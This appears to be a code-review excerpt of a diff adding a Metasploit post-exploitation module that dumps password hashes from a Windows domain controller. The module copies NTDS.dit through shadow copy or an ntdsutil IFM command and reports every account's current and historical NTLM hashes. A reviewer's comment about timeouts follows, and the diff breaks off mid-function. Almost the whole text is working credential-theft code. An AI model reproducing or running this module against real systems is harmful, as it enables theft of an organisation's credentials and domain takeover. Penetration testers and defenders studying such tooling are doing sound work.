modules/post/windows/gather/credentials/domain_hashdump.rb

```diff
@@ -0,0 +1,159 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+require 'rex'
+require 'msf/core/auxiliary/report'
+require 'metasploit/framework/ntds/parser'
+
+class Metasploit3 < Msf::Post
+  include Msf::Post::Windows::Registry
+  include Msf::Auxiliary::Report
+  include Msf::Post::Windows::Services
+  include Msf::Post::Windows::Priv
+  include Msf::Post::Windows::ShadowCopy
+
+  def initialize(info={})
+    super(update_info(info,
+      'Name'          => 'Windows Domain Controller Hashdump',
+      'Description'   => %q{
+        This module attempts to copy the NTDS.dit database from a live Domain Controller
+        and then parse out all of the User Accounts. It saves all of the captured password
+        hashes, including historical ones.
+  },
+      'License'       => MSF_LICENSE,
+      'Author'        => ['theLightCosine'],
+      'Platform'      => [ 'win' ],
+      'SessionTypes'  => [ 'meterpreter' ]
+  ))
+  end
+
+  def run
+    if preconditions_met?
+      ntds_file = copy_database_file
+      unless ntds_file.nil?
+        print_status "Repairing NTDS database after copy..."
+        print_status repair_ntds(ntds_file)
+        realm = domain_name
+        ntds_parser = Metasploit::Framework::NTDS::Parser.new(client, ntds_file)
+        ntds_parser.each_account do |ad_account|
+          print_good ad_account.to_s
+          report_hash(ad_account.ntlm_hash.downcase, ad_account.name, realm)
+          ad_account.nt_history.each_with_index do |nt_hash, index|
+            hash_string = ad_account.lm_history[index] || Metasploit::Credential::NTLMHash::BLANK_LM_HASH
+            hash_string << ":#{nt_hash}"
+            report_hash(hash_string.downcase,ad_account.name, realm)
+          end
+        end
+      end
+    end
+  end
+
+  def copy_database_file
+    database_file_path = nil
+    if start_vss
+      case  sysinfo["OS"]
+        when /2003| \.NET/
+          database_file_path = vss_method
+        when /2008|2012/
+          database_file_path = ntdsutil_method
+        else
+          print_error "This version of Windows is unsupported"
+      end
+    end
+    database_file_path
+  end
+
+  def domain_name
+    result = cmd_exec('cmd.exe', '/c systeminfo | findstr /B /C:"Domain"')
+    result.gsub!(/Domain:\s+/,'')
+  end
+
+  def is_domain_controller?
+    status = false
+    if session.fs.file.exists?('%SystemDrive%\Windows\ntds\ntds.dit')
+      status = true
+    end
+    status
+  end
+
+  def ntdsutil_method
+    tmp_path = "#{expand_path("%TEMP%")}\\#{Rex::Text.rand_text_alpha((rand(8)+6))}"
+    command_arguments = "\"activate instance ntds\" \"ifm\" \"Create Full #{tmp_path}\" quit quit"
+    result = cmd_exec("ntdsutil.exe", command_arguments)
```

Comment:
Have you tried this on a large domain? I used this command in anger recently and I think it would have exceeded the default 30s timeout. ntds.dit was ~1gig afaik